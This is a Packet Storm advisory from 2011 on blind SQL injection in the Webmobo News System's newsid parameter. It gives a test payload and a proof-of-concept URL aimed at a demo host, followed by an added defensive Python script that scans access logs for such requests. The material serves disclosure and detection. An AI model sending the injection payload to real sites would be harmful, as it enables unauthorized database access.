Webmobo News System SQL Injection

2011-09-05T00:00:00
ID PACKETSTORM:104795
Type packetstorm
Reporter Eyup CELIK
Modified 2011-09-05T00:00:00

Description

`# Exploit Title: Webmobo News System Blind SQL Injection  
# Date: 2011  
# Author: Eyup CELIK  
# Version: All versions  
# Tested on: All versions are vulnerable  
# Web Site: www.eyupcelik.com.tr  
  
  
ISSUE  
  
Blind SQL injection is possible through the newsid parameter of the sendto action.  
  
Vulnerable Page:  
index.php  
  
Example:  
index.php?action=sendto&newsid=<Blind SQL Injection Code>  
  
Exploit:  
index.php?action=sendto&newsid=1' and '2'='2  
  
POC:  
http://demo.webmobo.com/index.php?action=sendto&newsid=1%27%20and%20%272%27=%272  
  
  
Thanks,  
  
Eyup CELIK  
Information Technology Security Specialist  
http://www.eyupcelik.com.tr  
`
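
A way to check web server logs for requests matching this advisory, added here as an example and not part of the original advisory or the Webmobo code base. It assumes combined-format access logs and that a legitimate `newsid` is always a plain decimal integer; the log lines and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (combined log format), for illustration only.
SAMPLE_LOG = """\
198.51.100.7 - - [05/Sep/2011:10:00:01 +0000] "GET /index.php?action=sendto&newsid=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [05/Sep/2011:10:00:05 +0000] "GET /index.php?action=sendto&newsid=1%27%20and%20%272%27=%272 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [05/Sep/2011:10:00:09 +0000] "GET /index.php?action=view&newsid=7 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.4 - - [05/Sep/2011:10:01:00 +0000] "GET /index.php?action=sendto HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Client IP, timestamp and request target from one combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[A-Z]+ (?P<target>\S+) [^"]*"'
)

# Assumption: a valid newsid is a short decimal integer and nothing else.
NEWSID_OK = re.compile(r"[0-9]{1,10}")


def suspicious_newsid(target):
    """Return decoded newsid values that are not plain integers.

    Only index.php requests with action=sendto are considered, since that
    is the request the advisory names.
    """
    parts = urlsplit(target)
    if not parts.path.endswith("index.php"):
        return []
    # parse_qs percent-decodes values, so %27 is compared as a quote.
    query = parse_qs(parts.query, keep_blank_values=True)
    if "sendto" not in query.get("action", []):
        return []
    return [v for v in query.get("newsid", []) if not NEWSID_OK.fullmatch(v)]


def scan(log_text):
    """Return (ip, timestamp, decoded newsid) for every flagged request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        for value in suspicious_newsid(m["target"]):
            findings.append((m["ip"], m["ts"], value))
    return findings
```

The same integer-only rule applied server-side, before `newsid` reaches any query, rejects the request shown in the advisory.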